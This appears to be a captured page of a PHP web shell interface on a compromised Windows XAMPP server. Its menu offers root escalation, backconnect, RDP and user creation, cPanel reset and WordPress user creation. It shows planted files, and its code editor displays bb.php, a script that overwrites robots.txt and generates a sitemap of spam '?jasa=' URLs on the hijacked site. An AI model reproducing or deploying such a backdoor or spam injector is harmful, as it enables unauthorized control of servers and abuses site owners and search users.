Windows NT DESKTOP-F6O892L 6.2 build 9200 (Windows 8 Professional Edition) i586
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.19
: 10.220.0.88 | : 216.73.216.146
Cant Read [ /etc/named.conf ]
5.6.19
SC-SRV
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
[ D ]
[ E ]
D: /
xampp /
htdocs /
ia /
[ HOME SHELL ]
Name
Size
Permission
Action
bb.php
2.12
KB
-rw-rw-rw-
index.php
119.59
KB
-rw-rw-rw-
lol.txt
359.28
KB
-rw-rw-rw-
p.php
286
B
-rw-rw-rw-
robots.txt
81
B
-rw-rw-rw-
sitemap.min.xml
2.04
MB
-rw-rw-rw-
sitemap1.xml
2.44
MB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bb.php
<?php function getFileRowCount($filename) { $file = fopen($filename, "r"); $rowCount = 0; while (!feof($file)) { fgets($file); $rowCount++; } fclose($file); return $rowCount; } $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $fullUrl = $protocol . "://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; if (isset($fullUrl)) { $parsedUrl = parse_url($fullUrl); $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : ''; $host = isset($parsedUrl['host']) ? $parsedUrl['host'] : ''; $path = isset($parsedUrl['path']) ? $parsedUrl['path'] : ''; $baseUrl = $scheme . "://" . $host . $path; $urlAsli = str_replace("bb.php", "", $baseUrl); $robotsTxt = "User-agent: *" . PHP_EOL; $robotsTxt .= "Allow: /" . PHP_EOL; $robotsTxt .= "Sitemap: " . $urlAsli . "sitemap1.xml" . PHP_EOL; file_put_contents('robots.txt', $robotsTxt); $judulFile = "lol.txt"; $jumlahBaris = getFileRowCount($judulFile); $sitemapFile = fopen("sitemap1.xml", "w"); fwrite($sitemapFile, '<?xml version="1.0" encoding="UTF-8"?>' . PHP_EOL); fwrite($sitemapFile, '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL); $fileLines = file($judulFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); foreach ($fileLines as $index => $judul) { $sitemapLink = $urlAsli . '?jasa=' . urlencode($judul); fwrite($sitemapFile, ' <url>' . PHP_EOL); fwrite($sitemapFile, ' <loc>' . $sitemapLink . '</loc>' . PHP_EOL); date_default_timezone_set('Asia/Jakarta'); $currentTime = date('Y-m-d\TH:i:sP'); fwrite($sitemapFile, ' </url>' . PHP_EOL); } fwrite($sitemapFile, '</urlset>' . PHP_EOL); fclose($sitemapFile); echo "SITEMAP SUDAH DI BUAT, LANJUTKAN PERJUANGANMU BRAY ^^"; } else { echo "URL saat ini tidak didefinisikan."; } ?>
Close